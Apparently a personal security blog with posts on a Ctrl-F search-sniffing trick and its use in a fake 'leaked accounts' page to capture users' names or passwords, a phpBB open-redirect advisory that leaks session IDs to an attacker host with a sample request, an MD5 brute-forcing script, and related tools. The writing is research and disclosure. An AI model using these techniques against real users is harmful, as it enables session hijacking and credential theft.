## I know what you’re searching for…

Didn’t you always want to know what your visitors are searching for? And I don’t mean what they typed into Google, but what term(s) they try to find on your website (e.g. using Ctrl-F).

The idea is pretty straightforward: if you search for something on a site, your browser highlights what you are searching for (at least the first hit). So it has to somehow fiddle with the representation of the page. The shadow DOM seemed to present itself as a target for this. For those who have never heard of it, I recommend Glazkov (2011). In short, it is a way to create and modify elements hidden in the DOM; browsers frequently use it to draw complex items like media player controls. After some reading, trying to find out what the API might be, I stumbled upon document.getSelection(). I didn’t really think this would work, but in fact it does. Well, at least in Firefox. In Chrome the user has to close the search widget to make the searched term available. And in Opera it doesn’t work at all. So what do I mean by “it works”?

Firefox highlights the search result on the page and handles it as a selection. This enables the site to have a look at what you are typing in your search field. But there is one drawback: the getSelection method only works if the searched term can actually be found within the document.

To solve this, a pretty straightforward approach sprang to mind. I could just generate dynamic content providing all possible next inputs. So I basically generate a base set of printable characters and wait for the user to start his search. Then, as he is typing, I continuously check what he has typed so far and append a list of strings to the document, each consisting of the user’s term postfixed with one printable character. As long as this happens faster than he is typing and he types consecutively, not changing letters within the search term or at its beginning, it works. Those cases could be tackled by generating more letters in advance and also inserting them within the words. But the typical user’s behaviour should be covered.
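The candidate generation described above can be sketched in a few lines. This is only an illustration in Python; the actual page would have to do the same thing in JavaScript, and the names `PRINTABLE`, `next_candidates` and `page_text` are made up for this sketch. It also assumes that whitespace is left out of the character set.

```python
import string

# Assumption: letters, digits and punctuation are the characters worth predicting.
PRINTABLE = string.ascii_letters + string.digits + string.punctuation


def next_candidates(typed):
    """Return every string the search term could become with one more keystroke."""
    return [typed + ch for ch in PRINTABLE]


def page_text(typed):
    """Text the page would need to contain so that the next keystroke still finds a hit."""
    return " ".join(next_candidates(typed))
```

Calling `next_candidates("pa")` yields "paa", "pab" and so on, one string per character in the set. Each time the observed selection grows by one character, the page would be regenerated from the new prefix.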

A very simple proof of concept can be found here.

You might wonder by now why this is interesting at all. We have stored all our data at social communities and Google knows everything we search for anyhow. This brings me to how I initially got the idea to have a look at this. Once again I saw a tweet about a hacked site that I am registered at, with the leaked accounts presented on some random pastebin page. So I went there and did what? Of course, I searched for my email address, user name or whatever information might indicate that my account information got leaked and is now accessible to everyone else.

In this scenario, all they can find out is that I am the owner of the account I searched for. No harm done, except some privacy issues if combined with some more snooping. But what if an attacker generates user IDs on the fly based on what the lured user types? He would thereby gain new information about the victim’s user name at site XY or his registered email address, depending on what information is presented in the fake leak.

This could be taken even one step further. The site could present only numerical user IDs and corresponding passwords. Done as a targeted attack, this could reveal the user’s password, provided that he is careless enough to type his password into the search field of his browser. And the inhibition threshold is probably much lower than usual, because you type it into your own browser, not into the search function of some site or a search engine.

For those of you who really had a look at the demo, probably two questions/remarks arise.
First question is probably: Why are there 5 divs holding old selection predictions? That is caused by two factors. On the one hand more than one div is needed, because once the found search term gets replaced via JavaScript the selection will be an empty string. On the other hand fast typing will cause fast replacement of the divs and make them error prone, especially when deleting. Still there are some cases in which the script loses track, but the enhancements mentioned above should cure some.

Second remark would be that the generated text is not very carefully hidden. Well, at first I thought about leaving it as completely default text, which would make it easier to comprehend what is going on. But then again I wanted to make it at least somewhat less obvious. Sure, with CSS or iframes or whatever you have up your sleeve you can hide it completely from the potential victim.

By the way this also works with Pentadactyl in Firefox and Vimium in Chromium, when searching by “/”. This makes Chromium users using Vimium more susceptible to such an attack.

## Client Certificate HTTP Proxy

Hi there. Long time no see.

I just wanted to share my latest tiny project with you. It’s an HTTP proxy that authenticates the user with a given client certificate (in PEM format) to whatever web server he’s talking to. I needed this for a pentest I’m currently doing and thought I might just as well share it with all of you ;)
You can find it here at github.

If you give it a shot and notice some kind of problem or have a feature request, please file a bug or contact me otherwise.
Thanks and have fun with it.

## PromiFinder

I just started reading “Chained Exploits” recently and stumbled upon a quickly chipped in reference to PromiScan. This tool does something pretty interesting, which I’ve never heard of or read before.

In short, it uses ARP requests sent to the fake broadcast MAC address ff:ff:ff:ff:ff:fe to discover network interfaces that are in promiscuous mode. This is possible because, as it turns out, in normal mode the network interface hardware correctly filters out those requests. If the interface is in promiscuous mode, however, the hardware forwards everything and the software (e.g. the kernel driver) evaluates only part of the MAC address before it concludes it is a broadcast address. I’ve read their paper, which I recommend to everyone interested in this topic, and thought: why not develop such a tool myself for Linux (as theirs is for Windows)?
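To make the probe concrete, here is a minimal sketch of such an ARP request built with nothing but the Python standard library. It is not the code of promiFinder, which relies on scapy; the function names and the example addresses are assumptions for illustration. Sending the frame requires Linux and root privileges.

```python
import socket
import struct

FAKE_BROADCAST = "ff:ff:ff:ff:ff:fe"  # almost, but not quite, the broadcast address


def mac_to_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' into its 6 raw bytes."""
    return bytes(int(part, 16) for part in mac.split(":"))


def build_probe(src_mac, src_ip, target_ip, dst_mac=FAKE_BROADCAST):
    """Return a raw Ethernet frame carrying an ARP request for target_ip."""
    ethernet = mac_to_bytes(dst_mac) + mac_to_bytes(src_mac) + struct.pack("!H", 0x0806)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # hardware type: Ethernet
        0x0800,   # protocol type: IPv4
        6, 4,     # length of a MAC address and of an IPv4 address
        1,        # opcode: request
        mac_to_bytes(src_mac), socket.inet_aton(src_ip),
        b"\x00" * 6, socket.inet_aton(target_ip),
    )
    return ethernet + arp


def send_probe(interface, frame):
    """Send the frame on the given interface (Linux only, needs root)."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as sock:
        sock.bind((interface, 0))
        sock.send(frame)
```

A frame for one target could be built with `build_probe("00:11:22:33:44:55", "192.168.0.10", "192.168.0.20")` and sent with `send_probe("eth0", frame)`. Following the reasoning above, a host that answers this request is a candidate for running its interface in promiscuous mode.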

Toying with this led me to a little drawback of the approach. On Linux, WLAN seems to be implemented by using the interface as if in promiscuous mode. As a result, all WLAN interfaces of Linux computers (I only tested with Ubuntu) show up as promiscuous interfaces.

For everyone who wants to know what exactly I did, here is the source code. It currently checks all your network interfaces and scans all their subnets for promiscuous devices. In order to use it you need the Python packages netifaces and scapy. To run the tool, simply execute the following command as root or via sudo.

```
scapy -c promiFinder.py
```

## FileSharing via Browser: BrowserShare

I finally managed to get this project far enough to publish a first alpha version.
The idea is to utilize browsers to do file sharing. Well, I didn’t come up with this idea in the first place; I picked it up at ha.ckers.org.

The architecture is rather similar to that of BitTorrent. I initially wanted to implement the BitTorrent protocol, but I couldn’t find a plain, comprehensive description of it. After developing BrowserShare, I guess it would have been next to impossible anyway to implement a protocol that is designed for a pure p2p environment.
So, like BitTorrent, BrowserShare has a server, similar to a tracker, that only stores where to reach each client and the hashes of the files he desires and/or is willing to share.
Then there are the clients; they are where the data originates from or ends up. Like .torrent files in BitTorrent, a client needs a .bash file to be able to share a file with others or get it from others.
Last but not least, there are the browser instances that help to share the content. They get a list of users from the tracker and search for parts that one client has and others lack. Having found a match, the browser downloads the part from the client who shares it and sends it to all users needing it, thereby sharing its bandwidth with those who probably don’t have as much.
This makes it very easy for someone who wants to help the community share files but doesn’t want to install any software. All he has to do is point his browser to a special URL and he is a bandwidth sharer.

I’ve made a very short and plain presentation for our open study group CInsects, which describes the protocol and the used features a bit. You can find the slides here.

The next steps in this project are developing a GUI, making it possible to create .bash files from directories and prohibiting malicious usage of the browsers. The third point is the most difficult, because in the current setup the browser includes JavaScript from the clients, which can be arbitrary. A solution to this problem can be a crossdomain XMLHttpRequest, but this feature isn’t yet implemented in most stable branches of the commonly used browsers, as far as I know.
But nevertheless one could just test if this feature is available and choose this safer way to transmit information, leaving the current implementation as a fallback.
The current JavaScript could also be improved regarding this problem. The browser page the JavaScript code relies on could be refreshed after a given timeout to have a new, clean instance of the JavaScript. I’m not too well informed about browser caching, but it should be possible to get the browser to save all pages that transported data to him, so it won’t need to fetch it again from the clients.
Also, the search algorithm that matches who needs parts with who serves them is currently very simple. It only searches for the first match and then just takes it. A more sophisticated solution would be to find the shareable part needed by the most users, combined with some random picking. The random picking is needed for two reasons.
The first is that, if several browsers share bandwidth and all rely on the same algorithm to find the part they want to share next, they will all download the same part, probably from the same client, and then provide it to the other clients. They thereby waste a huge amount of bandwidth by doing the same thing in parallel.
The second is that, if new clients constantly join that desire the same file, and only very few nodes need just one last shareable part of another file, those few nodes might never get their last part.
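One way to combine "most needed" with random picking is a weighted random choice, where each part's chance of being picked grows with the number of users who need it. The following is only a sketch under that assumption and is not part of BrowserShare; `pick_part` and its data layout are hypothetical.

```python
import random
from collections import Counter


def pick_part(available, wanted, rng=random):
    """Pick the next part to relay.

    available: set of part indices that some client can serve
    wanted:    dict mapping each client to the set of part indices it still needs
    rng:       the random module or a random.Random instance
    """
    demand = Counter()
    for parts in wanted.values():
        for part in parts & available:
            demand[part] += 1
    if not demand:
        return None  # nothing that is needed can currently be served
    candidates = sorted(demand)
    weights = [demand[part] for part in candidates]
    # Popular parts are favoured, but rarely needed parts still get picked sometimes.
    return rng.choices(candidates, weights=weights, k=1)[0]
```

Because the choice is random, several browsers running the same code tend to spread over different parts, and a part needed by a single node keeps a nonzero chance of being selected.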

You can check it out via svn at https://hack0r.net/browserShare with username and password both anonymous. I don’t know if it will work on Windows machines; it has only been tested on Linux. I tried not to introduce platform-dependent code, but I didn’t test it, so I don’t know. The usage is described in the README. You should probably update your version frequently, as there is a pretty long todo list and I hope to work through it soon.

## phpBB Vulnerability: Login redirect SessionID leakage

Yesterday I informed the phpBB developers of a flaw I found, but they dismissed the issue and told me that such vulnerabilities are unavoidable. They further told me that the session ID on its own does not provide access, because some other parameters get checked, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know what they meant, but it sounds like an interesting implementation.

But let’s not get too much into detail before you know what this is all about. This is what I sent to the phpBB security tracker:

I. Problem Description

It is possible for an attacker to gain the SessionID from a victim. The
attacker has to bring the victim to visit a link like
This will reset the hidden redirect input field on the resulting page to
“http://mydoma.in/saveSID”. If the victim now logs in he will be
redirected to this URL appended with the sid as GET parameter, which
looks like this on the attackers server:

GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[…]

II. Impact

The leaked SessionID can be used to continue other users sessions and
therefore gaining control over their account.

III. Solution

I would recommend to not allow redirects to foreign domains at all, as
it does not seem to make sense to me.

Let’s get back to their objections. The first check, against the User-Agent header, really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.

The second is much more tricky, as it is comparatively easy to forge an IP address but pretty hard to receive the response to such a request. Well, at least to my knowledge. As far as I could see, they use nonces to prevent session riding, so you need the nonce to make state-changing requests.

Nevertheless, I think every effort should be made to keep the sid parameter from leaking outside the domain. Maybe someone else knows how to exploit this, or someday someone will find a way to do so.
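The fix recommended in the advisory, refusing redirects to foreign domains, could look roughly like the check below. phpBB itself is written in PHP; this Python sketch only illustrates the idea, and the function name `is_local_redirect` as well as the host `forum.example` are assumptions.

```python
from urllib.parse import urlsplit


def is_local_redirect(target, own_host):
    """Return True only if target stays on own_host (given in lowercase)."""
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or protocol-relative URL: accept only http(s) to our own host.
        return parts.scheme in ("http", "https") and parts.hostname == own_host
    # Relative path: reject backslashes, which some browsers treat like slashes.
    return "\\" not in target
```

With this check, `is_local_redirect("http://mydoma.in/saveSID", "forum.example")` is rejected, while a relative target such as `viewtopic.php?t=1` is accepted. The login page would fall back to a default page whenever the check fails, so the sid is never appended to a foreign URL.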

## MD5 Brute-Forcer

I just built a short MD5 brute-force script in Python and want to share it; maybe there is someone else out there who finds it interesting. It is based upon john, more precisely its incremental mode. This is because the stdout flag of john does not work in the default mode, for whatever reason. If someone knows why, please tell me.
I wrote it because today I had a lecture in which the lecturer challenged us to reverse a given MD5 hash. The usual databases did not lead to a hit, and neither did some dictionary-based attacks. So I decided to have john try it, but somehow I did not get it to recognize the hash as an MD5. Weirdly, md5sum calculated MD5s wrong for me, so I decided to create a short Python script.

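```python
import os
import sys
import hashlib

if len(sys.argv) == 2:
    d = sys.argv[1]
    # Let john generate candidate words in incremental mode, one per line.
    o = os.popen('john -stdout -incremental')
    for l in o:
        # Hash each candidate and compare it with the wanted digest.
        if hashlib.md5(l.strip().encode()).hexdigest() == d:
            print(l.strip())
else:
    print('usage is: ' + sys.argv[0] + ' <md5 hash>')
```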


P.S.: If someone knows why md5sum created wrong output, please enlighten me. The shell command looked like echo "word" | md5sum.

Update (April 23rd 2008):
Today I have been told why the md5sum shell command did not work. It is, because echo ends every output with a new line. You have to use echo -n to stop this behaviour.
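The effect is easy to reproduce in Python. The following small sketch, with the helper name `md5_hex` chosen for illustration, hashes the word once without and once with the trailing newline that echo appends:

```python
import hashlib


def md5_hex(data):
    """Return the hexadecimal MD5 digest of a byte string."""
    return hashlib.md5(data).hexdigest()


plain = md5_hex(b"word")            # what echo -n "word" | md5sum sees
with_newline = md5_hex(b"word\n")   # what echo "word" | md5sum sees

print(plain)
print(with_newline)
print(plain == with_newline)        # False: the newline is part of the hashed input
```

The two digests differ, which is why the md5sum output never matched the hash of the bare word.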

Update (May 6th 2008):
Yesterday I enhanced the script a little, so now it takes the hashes from a file and is also capable of brute-forcing several hashes at the same time, which was the main reason for this enhancement. The hashes in the file can be separated by any kind of whitespace character recognized by split().

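```python
import os
import re
import sys
import hashlib

if len(sys.argv) == 2:
    # Read the hashes from the given file; any whitespace separates them.
    with open(sys.argv[1]) as hash_file:
        f = hash_file.read().split()

    # Map each valid hash to its clear text (None while still unknown).
    d = {}
    for h in f:
        if re.search('^[0-9a-f]{32}$', h):
            d[h] = None
        else:
            print('Invalid hash has been removed:', h)

    o = os.popen('john -stdout -incremental')
    for l in o:
        word = l.strip()
        digest = hashlib.md5(word.encode()).hexdigest()
        if digest in d and d[digest] is None:
            d[digest] = word
            print('Hash:', digest, 'Clear:', word)
            # Stop as soon as every hash has been reversed.
            if all(v is not None for v in d.values()):
                for h in d:
                    print(h, '= "' + d[h] + '"')
                sys.exit(0)
else:
    print('usage is: ' + sys.argv[0] + ' <hash file>')
```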


## Bakkalaureatsarbeit

On Monday I finished my Bakkalaureatsarbeit. It’s somewhat like a bachelor thesis. So I only have to take some more exams, which I need for my diploma anyway, and then I am allowed to put a BSc in front of my name \begin{proudness} · · · \end{proudness}.

It deals with the subject of making web application vulnerability scanners more effective. We started developing a web application scanner nearly a year ago as a university project, on which this thesis is based. Some of the approaches built into the scanner are, as far as I know, completely new to web application scanning software. I am working on this project with Daniel Kreischer, with whom I also wrote the Bakkalaureatsarbeit, and Martin Johns, who supervised the project and the paper and gave us many hints, ideas and inspirations.

The scanner itself is not yet ready for release, since it is still under heavy construction to implement all the described features and ideas, but it is supposed to be in the near future. We already tried to hold a talk at the 24C3 last year about this project in an earlier state, but were rejected (at least in the last round as we heard).

If you are interested in this topic or just curious, here is the link to the paper “Bakkalaureatsarbeit: Similarity Examinations of Webpages and Complexity Reduction in Web Application Scanners”. Well, it spans over 60 pages, so it’s a little bit more than a usual paper, but if you are already familiar with the web itself and web application security you can certainly skip the first part.

If you have ideas, concerns or any kind of suggestion, please share them with us.

## Implementation Vulnerabilities and Detection Paper

I totally forgot to put this one online. It is already half a year old and was the result of a seminar that took place in the winter term 2006/2007.

It discusses both web application vulnerabilities, like XSS, CSRF, SQL injection and the like, and classical ones, like buffer overflows, format strings and dangling pointer references. Each vulnerability is explained first; afterwards we describe protection mechanisms and their possible problems.

There is only one major drawback: the paper is in German, so you are possibly not able to read it. But take this as your chance to learn it. ;)

## CIPHER 3 (aka germany – country of hackers)

It has been a while since my last posting, but I hope I can add some content again in the near future.

On Thursday, 12.07.2007, CIPHER 3 took place and we, the CInsects, participated in it. For those among you who don’t know what this is, here is a little summary of what a CTF is. I had more or less voluntarily agreed to set up our infrastructure but, as it is in life, hadn’t as much time as I thought I would have. So partly because of that, and partly because we always seem to start a little confused, we started pretty slowly and ranked in the last few places. But as the end got closer we slowly made our way towards the top. In the final spurt we wrote some obviously pretty good advisories, which gave us the lead in the advisory section and lifted us to 4th position in the end. We were really excited about this result, since nobody had bargained for such a good place after our muddled start.

The results and some statistics will be available next week on the CIPHER 3 homepage. Very interesting is the fact that the first 6 teams are from Germany. So Germany seems to be becoming the country of hackers … erm … I mean security experts ;). Well, possibly this is only because it is organized and held by a German team. Here is the final scoreboard. If you are interested in which team is from where and representing whom, just compare the numbers with those on the CIPHER 3 homepage.

I want to thank Lexi and his crew here again for making such a cool event possible, taking all the time it needs to prepare it and keeping calm when the players complain that something doesn’t work the way they want. Naturally I want to thank all the other participants too. It was a great game and I hope everyone enjoyed it as much as we did. :)

Update: Stats are available here.